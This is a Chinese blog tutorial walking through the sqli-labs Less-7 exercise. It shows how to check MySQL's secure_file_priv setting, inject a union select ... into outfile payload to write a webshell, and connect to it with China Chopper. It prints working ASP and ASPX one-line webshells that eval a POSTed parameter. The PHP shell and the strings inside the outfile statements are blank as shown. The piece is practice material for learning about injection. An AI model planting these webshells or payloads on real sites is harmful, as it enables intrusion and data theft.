sql注入与一句话木马

0x00 sql注入之一句话木马

首先介绍一下一句话木马:

一句话木马是一种基于
B/S结构的简短脚本,通过这个脚本,执行POST来的任意参数语句,可以提交任意内容,黑客借此进行SQL注入或拿到SHELL写入大马或截取网站私密信息,达到注入非法信息等的目的。

常见脚本的一句话木马:

php的一句话木马: 
asp的一句话是: <%eval request (“pass”)%>
aspx的一句话是: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>

0x01 注入条件

1.知道网站绝对路径
2,在mysql 中通过命令查看当前状态网站开启secure_file_priv开关需要是打开状态
secure_file_priv的状态有三种可能有三种状态

测试语句:show variables like’%secure%’
1.null 无法写入和读取
2.设置为一个目录名字,只允许在该路径下导入导出。
3.‘’空,可以在任意位置读取和写入

sql注入与一句话木马_第1张图片
如secure_file_priv结果不为空值,通过修改数据库ini文件加上语句

secure_file_priv= #文件中

[mysqld] secure_file_priv="" #文件尾
sql注入与一句话木马_第2张图片

0x02 测试注入

这里实验sqli-less-7利用文件上传写入一句话木马并且连接
1)测试后发现闭合状态为?id=1‘)) 字段数为3
sql注入与一句话木马_第3张图片
2) 检测数据读写权限,打开数据库属于测试语句

show variables like'%secure%'

结果显示为不可读写,通过添加语句secure_file_priv=到数据库ini文件再次重启数据库显示权限已经打开

3)写入php一句话木马到网站关卡文件夹(此处因为已经知道测试环境的绝对地址,故省略地址爆破)


> 数据库下注入语句:select "" INTO OUTFILE "D:\\phpstudy_pro\\WWW\\sqli\\Less-7\\shell.php";
url注入语句:http://127.0.0.1/sql1/Less-7/?id=1')) union select 1,2,'' into outfile "E:\\phpstudy_pro\\WWW\\sql1\\Less-7\\shell.php"--+

此处文件地址添加两条杠防止被转义

3)使用getshell工具菜刀连接
连接地址

http://192.168.0.104/sqli/Less-7/shell.php
本地:http://127.0.0.1/sqli/Less-7/shell.php

sql注入与一句话木马_第4张图片

你可能感兴趣的:(漏洞学习,mysql)